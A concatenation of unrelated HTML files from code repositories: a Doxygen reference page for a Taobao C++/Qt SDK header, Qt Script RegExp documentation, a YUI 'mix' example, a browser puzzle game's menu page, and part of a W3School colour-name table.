<title>Taobao Cpp/Qt SDK: TaoApiCpp/request/UserContractGetRequest.h File Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { searchBox.OnSelectItem(0); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">Taobao Cpp/Qt SDK
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.3.1 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="annotated.html"><span>Classes</span></a></li>
<li class="current"><a href="files.html"><span>Files</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="files.html"><span>File List</span></a></li>
<li><a href="globals.html"><span>File Members</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark"> </span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark"> </span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark"> </span>Pages</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="dir_5ced2c06884fa9bf5c2da90298abd959.html">TaoApiCpp</a></li><li class="navelem"><a class="el" href="dir_1128517a525300e3048e72552ab6f4a6.html">request</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#nested-classes">Classes</a> </div>
<div class="headertitle">
<div class="title">UserContractGetRequest.h File Reference</div> </div>
</div><!--header-->
<div class="contents">
<div class="textblock"><code>#include <<a class="el" href="TaoRequest_8h_source.html">TaoApiCpp/TaoRequest.h</a>></code><br/>
<code>#include <<a class="el" href="TaoParser_8h_source.html">TaoApiCpp/TaoParser.h</a>></code><br/>
<code>#include <<a class="el" href="UserContractGetResponse_8h_source.html">TaoApiCpp/response/UserContractGetResponse.h</a>></code><br/>
</div>
<p><a href="UserContractGetRequest_8h_source.html">Go to the source code of this file.</a></p>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="nested-classes"></a>
Classes</h2></td></tr>
<tr class="memitem:"><td class="memItemLeft" align="right" valign="top">class  </td><td class="memItemRight" valign="bottom"><a class="el" href="classUserContractGetRequest.html">UserContractGetRequest</a></td></tr>
<tr class="separator:"><td class="memSeparator" colspan="2"> </td></tr>
</table>
</div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Sun Apr 14 2013 16:25:37 for Taobao Cpp/Qt SDK by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.3.1
</small></address>
</body>
</html>
|
src/qsa/doc/html/language-3-1-10.html | gestiweb/eneboo | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- ../references/built-in-types-and-objects.leaf:867 -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>RegExp</title>
<style type="text/css"><!--
h3.fn,span.fn { margin-left: 1cm; text-indent: -1cm; }
a:link { color: #004faf; text-decoration: none }
a:visited { color: #672967; text-decoration: none }
body { background: #ffffff; color: black; }
--></style>
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr bgcolor="black"><td>
|<a href="index.html"><font color="white">Home</font></a>
<font color="white">|</font>
<a href="qsa.html">
<font color="white">Tutorial</font></a>
<font color="white">|</font>
<a href="classes.html"><font color="white">Classes</font></a>
<font color="white">|</font>
<a href="functions.html"><font color="white">Functions</font></a>
<font color="white">|</font>
<a href="qtscripter.html"><font color="white">QSA Workbench</font></a>
<font color="white">|</font>
<a href="language.html"><font color="white">Language</font></a>
<font color="white">|</font>
<a href="http://doc.trolltech.com"><font color="white">Qt API</font></a>
<font color="white">|</font>
<a href="articles.html"><font color="white">QSA Articles</font></a>
</td>
<td align="right"><a href="index.html"><font
color="white"><i>Qt Script for Applications</i></font></a></td>
<td align="right" valign="center"><img src="logo32.png" align="right" width="64" height="32" border="0"></td></tr></table><p align="right">[<a href="language-3-1-9.html">Prev: Size</a>] [<a href="language.html">Home</a>] [<a href="language-3-1-11.html">Next: String</a>]</p>
<h4 align="center">RegExp</h4>
<p>A <font color=blue><tt>RegExp</tt></font> is a regular expression matcher for strings.</p>
<p>Regular expressions can be created either by using the <tt>/expression/</tt> syntax or by using the RegExp constructor as shown below. Note that when using the RegExp constructor, a string is passed, and all backslashes must be escaped using an extra backslash, i.e. <tt></tt>\d. Below are two ways to create regular expressions that matches the pattern "QUANTITY=471 # Order quantity" and gets the number 471.</p>
<pre>
var directRegex = /([A-Z]+)=(\d+)/;
var str = "QUANTITY=471 # Order quantity";
str.match(directRegex);
directRegex.capturedTexts[2]; // "471";
var indirectRegex = new RegExp( "([A-Z]+)=(\\d+)" );
</pre>
<h5><a name="1"></a>RegExp Properties</h5>
<ul><li><p>valid : Boolean; Returns true if the regular expression is syntactically valid; otherwise returns false.</p>
<li><p>empty : Boolean; Returns true if the pattern is empty; otherwise returns false.</p>
<li><p>matchedLength : Number; The length of the last matched string, or -1 if there was no match.</p>
<li><p>capturedTexts : String[]; An array of all the captured texts from the previous match. This can be empty.</p>
<li><p>global : Boolean; Specifies that the regexp should be matched globally. A global regexp will match every occurrence (i.e. as many times as possible), whereas a non-global regexp will match at most once (at the first match it encounters). This is particularly relevant for replace where every occurance of a pattern will be replaced when global is true.</p>
<p>A regular expression can be set to global either by setting the global property on a regexp object or by specifying a trailing <tt>g</tt> in the pattern.</p>
<pre>
var re = /mypattern/g; // Global by method #1
var re = /mypattern/;
re.global = true // Global by method #2
</pre>
<li><p>ignoreCase : Boolean; Specifies that the regexp ignores case when matching. Case-insensitivity can is enabled by either specifying a trailing <tt>i</tt> after the pattern or by setting the <tt>ignoreCase</tt> property.</p>
<pre>
var re = /mypattern/i; // Case-insensitive by method #1
var re = /mypattern/;
re.ignoreCase = true; // Case-insensitive by method #2
</pre>
</ul><h5><a name="2"></a>RegExp Functions</h5>
<ul><li><p>toString() : String; Returns the regular expression pattern as a string.</p>
<li><p>search( text : String ) : Number;</p>
<pre>
var re = /\d+ cm/; // matches one or more digits followed by space then 'cm'
re.search( "A meter is 100 cm long" ); // returns 11
</pre>
<p>Searches <tt>text</tt> for the pattern defined by the regular expression. The function returns the position in the text of the first match or -1 if no match is found.</p>
<li><p>searchRev( text : String ) : Number; Same as <tt>search()</tt>, but searchRev searches from the end of the text.</p>
<li><p>exactMatch( text : String ) : Boolean; Returns true if <tt>text</tt> exactly matches the pattern in this regular expresssion; otherwise returns false.</p>
<li><p>cap( nth : Number ) : String;</p>
<pre>
re = /name: ([a-zA-Z ]+)/;
re.search( "name: John Doe, age: 42" );
re.cap(0); // returns "name: John Doe"
re.cap(1); // returns "John Doe"
re.cap(2); // returns undefined, no more captures.
</pre>
<p>Returns the <tt>nth</tt> capture of the pattern in the previously matched text. The first captured string (<tt>cap(0)</tt> ) is the part of the string that matches the pattern itself, if there is a match. The following captured strings are the parts of the pattern enclosed by parenthesis. In the example above we try to capture <tt>([a-zA-Z ]+)</tt>, which captures a sequence of one or more letters and spaces after the <tt>name:</tt> part of the string.</p>
<li><p>pos( nth : Number ) : Number;</p>
<pre>
re = /name: ([a-zA-Z ]+)/;
re.search( "name: John Doe, age: 42" );
re.pos(0); // returns 0, position of "name: John Doe"
re.pos(1); // returns 6, position of "John Doe"
re.pos(2); // returns -1, no more captures
</pre>
<p>Returns the position of the <tt>nth</tt> captured text in the search string.</p>
</ul><!-- eof -->
<p align="right">[<a href="language-3-1-9.html">Prev: Size</a>] [<a href="language.html">Home</a>] [<a href="language-3-1-11.html">Next: String</a>]</p>
<p><address><hr><div align=center>
<table width=100% cellspacing=0 border=0><tr>
<td>Copyright © 2001-2006 Trolltech<td><a href="http://www.trolltech.com/trademarks.html">Trademarks</a>
<td align=right><div align=right>QSA version 1.1.5</div>
</table></div></address></body>
</html>
|
sites/all/libraries/yui/docs/yui/yui-mix.html | artefactual-labs/trac | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Example: Add Behaviors to Objects with `mix`</title>
<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=PT+Sans:400,700,400italic,700italic">
<link rel="stylesheet" href="../../build/cssgrids/grids-min.css">
<link rel="stylesheet" href="../assets/css/main.css">
<link rel="stylesheet" href="../assets/vendor/prettify/prettify-min.css">
<link rel="shortcut icon" type="image/png" href="../assets/favicon.png">
<script src="../../build/yui/yui-min.js"></script>
</head>
<body>
<!--
<a href="https://github.com/yui/yui3"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://s3.amazonaws.com/github/ribbons/forkme_right_darkblue_121621.png" alt="Fork me on GitHub"></a>
-->
<div id="doc">
<div id="hd">
<h1><img src="http://yuilibrary.com/img/yui-logo.png"></h1>
</div>
<h1>Example: Add Behaviors to Objects with `mix`</h1>
<div class="yui3-g">
<div class="yui3-u-3-4">
<div id="main">
<div class="content"><div class="intro">
<p>Add behaviors to objects or static classes with <code>mix</code></p>
</div>
<div class="example">
<script>
YUI().use('node', function(Y) {
var Logging = function () {
var logger = null;
return {
initLogger : function (logNode) {
if (!logger) {
logger = Y.one(logNode);
}
},
log : function (message) {
if (logger) {
logger.append('<p>' + message + '</p>');
}
}
}
}();
var PageController = function () {
var app_const = 12345;
return {
getConst : function () {
return app_const;
},
logConst : function () {
this.initLogger('#demo_logger');
this.log('PageController class constant = ' + this.getConst() +
', logged courtesy of object augmentation via Y.mix.');
}
};
}();
Y.mix(PageController, Logging);
Y.on('click', PageController.logConst, '#demo_btn', PageController);
});
</script>
<button id="demo_btn">Click me</button>
<div id="demo_logger"></div>
</div>
<h3>Using <code>mix</code></h3>
<pre class="code prettyprint">YUI().use('node', function(Y) {
// This method is in the core of the library, so we don't have to use() any
// additional modules to access it. However, this example requires 'node'.</pre>
<h3>Adding functionality to individual objects</h3>
<p>Static classes, such as <code>DOM</code>, are implemented as object literals
with keys corresponding to public class methods. As such, static classes
aren't candidates for instantiation or prototype extension. To add
functionality to static classes, you need to work with the class's object
literal.</p>
<p>In this example, <code>mix</code> is used to add a set of behaviors to a static class.</p>
<pre class="code prettyprint">var Logging = function () {
var logger = null;
return {
initLogger : function (logNode) {
if (!logger) {
logger = Y.one(logNode);
}
},
log : function (message) {
if (logger) {
logger.append('<p>' + message + '</p>');
}
}
}
}();
var PageController = function () {
var app_const = 12345;
return {
getConst : function () {
return app_const;
},
logConst : function () {
this.initLogger('#demo_logger');
this.log('PageController class constant = ' + this.getConst() +
', logged courtesy of object augmentation via Y.mix.');
}
};
}();
Y.mix(PageController, Logging);
Y.on('click', PageController.logConst, '#demo_btn', PageController);</pre>
<h3>Much like <code>augment</code></h3>
<p><code>mix</code> works in similar fashion to <code>augment</code>. In fact, <code>augment</code> uses <code>mix</code> under the hood. However, rather than adding functionality to class definitions (i.e. function prototypes), <code>mix</code> can work with any object, including object literals and class instances.</p>
<p>See <code>augment</code> and <code>extend</code> for other techniques to help manage your code structure.</p>
</div>
</div>
</div>
<div class="yui3-u-1-4">
<div class="sidebar">
<div class="sidebox">
<div class="hd">
<h2 class="no-toc">Examples</h2>
</div>
<div class="bd">
<ul class="examples">
<li data-description="Setting up a YUI Instance">
<a href="yui-core.html">YUI Core</a>
</li>
<li data-description="Working with multiple YUI instances.">
<a href="yui-multi.html">Multiple Instances</a>
</li>
<li data-description="On-demand loading of YUI and non-YUI assets">
<a href="yui-loader-ext.html">YUI Loader - Dynamically Adding YUI and External Modules</a>
</li>
<li data-description="Create Class Hierarchies with `extend`">
<a href="yui-extend.html">Create Class Hierarchies with `extend`</a>
</li>
<li data-description="Creating a composition-based class structure using `augment`">
<a href="yui-augment.html">Compose Classes of Objects with `augment`</a>
</li>
<li data-description="Add behaviors to objects or static classes with `mix`">
<a href="yui-mix.html">Add Behaviors to Objects with `mix`</a>
</li>
<li data-description="Combine data sets and create shallow copies of objects with `merge`">
<a href="yui-merge.html">Combine Data Sets with `merge`</a>
</li>
<li data-description="Check data types with the `Lang Utilities`">
<a href="yui-isa.html">Check Data Types with `Lang`</a>
</li>
<li data-description="Get information about the current user agent with `UA`">
<a href="yui-ua.html">Browser Detection with `UA`</a>
</li>
<li data-description="Working with YUI 2 in 3">
<a href="yui-yui2.html">Working with YUI 2 in 3</a>
</li>
<li data-description="Natively use YUI Gallery Modules">
<a href="yui-gallery.html">Natively use YUI Gallery Modules</a>
</li>
<li data-description="Programatically use Loader">
<a href="loader-resolve.html">Programatically use Loader</a>
</li>
<li data-description="Executing functions in parallel">
<a href="parallel.html">Using Y.Parallel</a>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="../assets/vendor/prettify/prettify-min.js"></script>
<script>prettyPrint();</script>
<script>
YUI.Env.Tests = {
examples: [],
project: '../assets',
assets: '../assets/yui',
name: 'yui-mix',
title: 'Add Behaviors to Objects with `mix`',
newWindow: '',
auto: false
};
YUI.Env.Tests.examples.push('yui-core');
YUI.Env.Tests.examples.push('yui-multi');
YUI.Env.Tests.examples.push('yui-loader-ext');
YUI.Env.Tests.examples.push('yui-extend');
YUI.Env.Tests.examples.push('yui-augment');
YUI.Env.Tests.examples.push('yui-mix');
YUI.Env.Tests.examples.push('yui-merge');
YUI.Env.Tests.examples.push('yui-isa');
YUI.Env.Tests.examples.push('yui-ua');
YUI.Env.Tests.examples.push('yui-yui2');
YUI.Env.Tests.examples.push('yui-gallery');
YUI.Env.Tests.examples.push('loader-resolve');
YUI.Env.Tests.examples.push('parallel');
</script>
<script src="../assets/yui/test-runner.js"></script>
</body>
</html>
|
swix/swix.html | jacobEwing/webgames | <!DOCTYPE html>
<html>
<head>
<meta property="og:image" content="/Swix.png" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="icon" type="image/png" sizes="32x32" href="images/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="images/favicon-16x16.png">
<link rel="stylesheet" type="text/css" href="swix.css" />
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="spriteSet.js"></script>
<script type="text/javascript" src="cellClass.js"></script>
<script type="text/javascript" src="swix.js"></script>
<script type="text/javascript" src="levels.js"></script>
<script type="text/javascript">
window.onload = function(){ document.getElementById('contentWrapper').style.display = 'none'; startGame() };
</script>
</head>
<body>
<div id="gameWrapper" class="noSelect">
<div id="centering">
<div id="loadingPrompt"></div>
<div id="menuWrapper">
<div id="menuBackdrop"></div>
<div id="menuTop">
<img src="images/swix.png" id="menuSwixText" onclick = "startPlaying();"/>
<span id="creditsButton" class="menuLink rotNeg60" onclick="showAbout();">Credits</span>
<span id="startButton" class="menuLink" onclick="startPlaying();">Play!</span>
<span id="settingsButton" class="menuLink rot60" onclick="showSettings();">Settings</span>
</div>
<div id="aboutMenu">
<span id="aboutMainMenuButton" class="menuLink rotNeg60" onclick="aboutShowMainMenu();">Back</span>
<div id="creditList">
<img src="images/swix.png" style="margin:auto;margin-top: -3em;margin-bottom: -1.5em;">
<!--img src="images/swix.png" style="margin:auto; margin-top: -4em"/-->
<h3>Design, development and graphics:</h3><p>Jacob Ewing <a class="rotNeg3" href="http://weirdly.net">weirdly.net</a></p>
<h3>Royalty free music:</h3><p>Bensound <a class="rot3" href="https://bensound.com/">bensound.com</a></p>
<h3>Fonts:</h3>
<p>
"Cheveux D'ange" ("Angel Hair"): Michel LUN
<br/><a class="rotNeg3" href="https://peax-webdesign.com">peax-webdesign.com</a>
</p>
<br/>
<p>
"Neucha": Jovanny Lemonad
<br/><a class="rot3" href="https://fonts.google.com/specimen/Neucha">https://fonts.google.com/specimen/Neucha</a>
</p>
<h3>Sound efects courtesy of</h3><p><a class="rotNeg3" href="https://freesound.org/">freesound.org</a>:</p>
<div id="soundCredits">
<div>
<span class="sampleSpeaker rot10" onclick="playSound('mouseClick', true);"><img src="images/speaker.png"/></span>
<a class="rot3" href="https://freesound.org/people/Ayliffe/sounds/69930/">Marble impact</a>
<br/>
by Ayliffe
</div>
<div>
<span class="sampleSpeaker rotNeg10" onclick="playSound('swish', true);"><img src="images/speaker.png"/></span>
<a class="rotNeg3" href="https://freesound.org/people/soundscalpel.com/sounds/110616/">Cable whoosh through air</a>
<br/>
by "soundscalpel.com"
</div>
<div>
<span class="sampleSpeaker rot10" onclick="playSound('crank', true);"><img src="images/speaker.png"/></span>
<a class="rot3" href="https://freesound.org/people/bolkmar/sounds/459613/">FX Wheel Mechanism</a>
<br/>
by bolkmar
</div>
</div>
</div>
</div>
<div id="settingsMenu">
<span id="settingsMainMenuButton" class="menuLink rot60" onclick="settingsShowMainMenu();">Back</span>
<img src="images/swix.png" style="margin:auto; margin-top: -2em; margin-bottom: 3em"/>
<div id="optionMenuWrapper">
<div id="soundCheckbox" onclick="toggleSound();">
Sound: <span id="soundCheckmark" class="rot3">On</span><br/>
</div>
Music Volume: <input id="musicVolumeSlider" class="volumeSlider" type="range" min="0" max="1" value=".5" class="slider" step = ".01" onInput="setMusicVolume(this.value)"/><br/>
Effects Volume: <input id="effectsVolumeSlider" class="volumeSlider" type="range" min="0" max="1" value="1" class="slider" step = ".01" onInput="setEffectsVolume(this.value)"/><br/>
<div id="levelSelectWrapper">
Current Level:
<select id="startingLevel">
</select>
</div>
</div>
</div>
</div>
<div id="contentWrapper"><!-- style="display:none"-->
<div id="topOptions" class="noSelect">
<div id="swix"><img src="images/swix.png"/></div>
<div id="stepstitle" class="topRightEdge">Moves:</div>
<div id="stepstaken" class="topRightEdge">0</div>
<div id="beststepstitle" class="topRightEdge">Best:</div>
<div id="beststeps" class="topRightEdge">0</div>
</div>
<div id="content"></div>
<a id="skipButton" class="rightActionButton" onclick="skipLevel(1); return false;">Next</a>
<a id="prevButton" class="rightActionButton" onclick="skipLevel(-1); return false;">Previous</a>
<a id="resetButton" class="leftActionButton" onclick="restartLevel(); return false">Reset</a>
<a id="exitButton" class="leftActionButton" onclick="toMenu(); return false;">Exit</a>
<div id="titleDivWrapper">
<div id="titleDiv"></div>
</div>
</div>
</div>
</div>
<div id="interfaceModules">
<div class="promptWrapper noSelect">
<div class="promptBox">
<div class="promptContent">
</div>
<div style="clear: both; padding-top: 2em; position: relative;">
<div class="disableHints colouredButton">Disable Tips</div>
<div class="closeButton colouredButton">Close</div>
</div>
</div>
</div>
</div>
</body>
</html>
|
Coding/W3School/W3CN/www.w3school.com.cn/tiy/color0eeb.html | platinhom/ManualHom | <!DOCTYPE html>
<html lang="zh-cn">
<!-- Mirrored from www.w3school.com.cn/tiy/color.asp?color=Azure by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 01 Dec 2015 23:46:18 GMT -->
<head>
<meta charset="utf-8" />
<meta name="robots" content="all" />
<meta name="author" content="w3school.com.cn" />
<link rel="stylesheet" type="text/css" href="color.css" />
<title>W3School 颜色测试</title>
</head>
<body>
<div id="wrapper">
<div id="header">
<script type="text/javascript"><!--
google_ad_client = "ca-pub-3381531532877742";
/* color_asp */
google_ad_slot = "5651966117";
google_ad_width = 970;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="../../pagead2.googlesyndication.com/pagead/f.txt">
</script>
</div>
<div id="maincontent">
<h1>W3School 颜色测试</h1>
<p id="bg_color">表格的背景色:<em>Azure</em> ,与不同的文本颜色一同显示。</p>
<table style="background-color:Azure">
<tr>
<th>颜色名</th>
<th>HEX</th>
<th>RGB</th>
</tr>
<tr>
<td style='color:#F0F8FF'>AliceBlue</td>
<td style='color:#F0F8FF'>F0F8FF</td>
<td style='color:#F0F8FF'>240,248,255</td>
</tr>
<tr>
<td style='color:#FAEBD7'>AntiqueWhite</td>
<td style='color:#FAEBD7'>FAEBD7</td>
<td style='color:#FAEBD7'>250,235,215</td>
</tr>
<tr>
<td style='color:#00FFFF'>Aqua</td>
<td style='color:#00FFFF'>00FFFF</td>
<td style='color:#00FFFF'>0,255,255</td>
</tr>
<tr>
<td style='color:#7FFFD4'>Aquamarine</td>
<td style='color:#7FFFD4'>7FFFD4</td>
<td style='color:#7FFFD4'>127,255,212</td>
</tr>
<tr>
<td style='color:#F0FFFF'>Azure</td>
<td style='color:#F0FFFF'>F0FFFF</td>
<td style='color:#F0FFFF'>240,255,255</td>
</tr>
<tr>
<td style='color:#F5F5DC'>Beige</td>
<td style='color:#F5F5DC'>F5F5DC</td>
<td style='color:#F5F5DC'>245,245,220</td>
</tr>
<tr>
<td style='color:#FFE4C4'>Bisque</td>
<td style='color:#FFE4C4'>FFE4C4</td>
<td style='color:#FFE4C4'>255,228,196</td>
</tr>
<tr>
<td style='color:#000000'>Black</td>
<td style='color:#000000'>000000</td>
<td style='color:#000000'>0,0,0</td>
</tr>
<tr>
<td style='color:#FFEBCD'>BlanchedAlmond</td>
<td style='color:#FFEBCD'>FFEBCD</td>
<td style='color:#FFEBCD'>255,235,205</td>
</tr>
<tr>
<td style='color:#0000FF'>Blue</td>
<td style='color:#0000FF'>0000FF</td>
<td style='color:#0000FF'>0,0,255</td>
</tr>
<tr>
<td style='color:#8A2BE2'>BlueViolet</td>
<td style='color:#8A2BE2'>8A2BE2</td>
<td style='color:#8A2BE2'>138,43,226</td>
</tr>
<tr>
<td style='color:#A52A2A'>Brown</td>
<td style='color:#A52A2A'>A52A2A</td>
<td style='color:#A52A2A'>165,42,42</td>
</tr>
<tr>
<td style='color:#DEB887'>BurlyWood</td>
<td style='color:#DEB887'>DEB887</td>
<td style='color:#DEB887'>222,184,135</td>
</tr>
<tr>
<td style='color:#5F9EA0'>CadetBlue</td>
<td style='color:#5F9EA0'>5F9EA0</td>
<td style='color:#5F9EA0'>95,158,160</td>
</tr>
<tr>
<td style='color:#7FFF00'>Chartreuse</td>
<td style='color:#7FFF00'>7FFF00</td>
<td style='color:#7FFF00'>127,255,0</td>
</tr>
<tr>
<td style='color:#D2691E'>Chocolate</td>
<td style='color:#D2691E'>D2691E</td>
<td style='color:#D2691E'>210,105,30</td>
</tr>
<tr>
<td style='color:#FF7F50'>Coral</td>
<td style='color:#FF7F50'>FF7F50</td>
<td style='color:#FF7F50'>255,127,80</td>
</tr>
<tr>
<td style='color:#6495ED'>CornflowerBlue</td>
<td style='color:#6495ED'>6495ED</td>
<td style='color:#6495ED'>100,149,237</td>
</tr>
<tr>
<td style='color:#FFF8DC'>Cornsilk</td>
<td style='color:#FFF8DC'>FFF8DC</td>
<td style='color:#FFF8DC'>255,248,220</td>
</tr>
<tr>
<td style='color:#DC143C'>Crimson</td>
<td style='color:#DC143C'>DC143C</td>
<td style='color:#DC143C'>220,20,60</td>
</tr>
<tr>
<td style='color:#00FFFF'>Cyan</td>
<td style='color:#00FFFF'>00FFFF</td>
<td style='color:#00FFFF'>0,255,255</td>
</tr>
<tr>
<td style='color:#00008B'>DarkBlue</td>
<td style='color:#00008B'>00008B</td>
<td style='color:#00008B'>0,0,139</td>
</tr>
<tr>
<td style='color:#008B8B'>DarkCyan</td>
<td style='color:#008B8B'>008B8B</td>
<td style='color:#008B8B'>0,139,139</td>
</tr>
<tr>
<td style='color:#B8860B'>DarkGoldenRod</td>
<td style='color:#B8860B'>B8860B</td>
<td style='color:#B8860B'>184,134,11</td>
</tr>
<tr>
<td style='color:#A9A9A9'>DarkGray</td>
<td style='color:#A9A9A9'>A9A9A9</td>
<td style='color:#A9A9A9'>169,169,169</td>
</tr>
<tr>
<td style='color:#006400'>DarkGreen</td>
<td style='color:#006400'>006400</td>
<td style='color:#006400'>0,100,0</td>
</tr>
<tr>
<td style='color:#BDB76B'>DarkKhaki</td>
<td style='color:#BDB76B'>BDB76B</td>
<td style='color:#BDB76B'>189,183,107</td>
</tr>
<tr>
<td style='color:#8B008B'>DarkMagenta</td>
<td style='color:#8B008B'>8B008B</td>
<td style='color:#8B008B'>139,0,139</td>
</tr>
<tr>
<td style='color:#556B2F'>DarkOliveGreen</td>
<td style='color:#556B2F'>556B2F</td>
<td style='color:#556B2F'>85,107,47</td>
</tr>
<tr>
<td style='color:#FF8C00'>Darkorange</td>
<td style='color:#FF8C00'>FF8C00</td>
<td style='color:#FF8C00'>255,140,0</td>
</tr>
<tr>
<td style='color:#9932CC'>DarkOrchid</td>
<td style='color:#9932CC'>9932CC</td>
<td style='color:#9932CC'>153,50,204</td>
</tr>
<tr>
<td style='color:#8B0000'>DarkRed</td>
<td style='color:#8B0000'>8B0000</td>
<td style='color:#8B0000'>139,0,0</td>
</tr>
<tr>
<td style='color:#E9967A'>DarkSalmon</td>
<td style='color:#E9967A'>E9967A</td>
<td style='color:#E9967A'>233,150,122</td>
</tr>
<tr>
<td style='color:#8FBC8F'>DarkSeaGreen</td>
<td style='color:#8FBC8F'>8FBC8F</td>
<td style='color:#8FBC8F'>143,188,143</td>
</tr>
<tr>
<td style='color:#483D8B'>DarkSlateBlue</td>
<td style='color:#483D8B'>483D8B</td>
<td style='color:#483D8B'>72,61,139</td>
</tr>
<tr>
<td style='color:#2F4F4F'>DarkSlateGray</td>
<td style='color:#2F4F4F'>2F4F4F</td>
<td style='color:#2F4F4F'>47,79,79</td>
</tr>
<tr>
<td style='color:#00CED1'>DarkTurquoise</td>
<td style='color:#00CED1'>00CED1</td>
<td style='color:#00CED1'>0,206,209</td>
</tr>
<tr>
<td style='color:#9400D3'>DarkViolet</td>
<td style='color:#9400D3'>9400D3</td>
<td style='color:#9400D3'>148,0,211</td>
</tr>
<tr>
<td style='color:#FF1493'>DeepPink</td>
<td style='color:#FF1493'>FF1493</td>
<td style='color:#FF1493'>255,20,147</td>
</tr>
<tr>
<td style='color:#00BFFF'>DeepSkyBlue</td>
<td style='color:#00BFFF'>00BFFF</td>
<td style='color:#00BFFF'>0,191,255</td>
</tr>
<tr>
<td style='color:#696969'>DimGray</td>
<td style='color:#696969'>696969</td>
<td style='color:#696969'>105,105,105</td>
</tr>
<tr>
<td style='color:#696969'>DimGrey</td>
<td style='color:#696969'>696969</td>
<td style='color:#696969'>105,105,105</td>
</tr>
<tr>
<td style='color:#1E90FF'>DodgerBlue</td>
<td style='color:#1E90FF'>1E90FF</td>
<td style='color:#1E90FF'>30,144,255</td>
</tr>
<tr>
<td style='color:#B22222'>FireBrick</td>
<td style='color:#B22222'>B22222</td>
<td style='color:#B22222'>178,34,34</td>
</tr>
<tr>
<td style='color:#FFFAF0'>FloralWhite</td>
<td style='color:#FFFAF0'>FFFAF0</td>
<td style='color:#FFFAF0'>255,250,240</td>
</tr>
<tr>
<td style='color:#228B22'>ForestGreen</td>
<td style='color:#228B22'>228B22</td>
<td style='color:#228B22'>34,139,34</td>
</tr>
<tr>
<td style='color:#FF00FF'>Fuchsia</td>
<td style='color:#FF00FF'>FF00FF</td>
<td style='color:#FF00FF'>255,0,255</td>
</tr>
<tr>
<td style='color:#DCDCDC'>Gainsboro</td>
<td style='color:#DCDCDC'>DCDCDC</td>
<td style='color:#DCDCDC'>220,220,220</td>
</tr>
<tr>
<td style='color:#F8F8FF'>GhostWhite</td>
<td style='color:#F8F8FF'>F8F8FF</td>
<td style='color:#F8F8FF'>248,248,255</td>
</tr>
<tr>
<td style='color:#FFD700'>Gold</td>
<td style='color:#FFD700'>FFD700</td>
<td style='color:#FFD700'>255,215,0</td>
</tr>
<tr>
<td style='color:#DAA520'>GoldenRod</td>
<td style='color:#DAA520'>DAA520</td>
<td style='color:#DAA520'>218,165,32</td>
</tr>
<tr>
<td style='color:#808080'>Gray</td>
<td style='color:#808080'>808080</td>
<td style='color:#808080'>128,128,128</td>
</tr>
<tr>
<td style='color:#008000'>Green</td>
<td style='color:#008000'>008000</td>
<td style='color:#008000'>0,128,0</td>
</tr>
<tr>
<td style='color:#ADFF2F'>GreenYellow</td>
<td style='color:#ADFF2F'>ADFF2F</td>
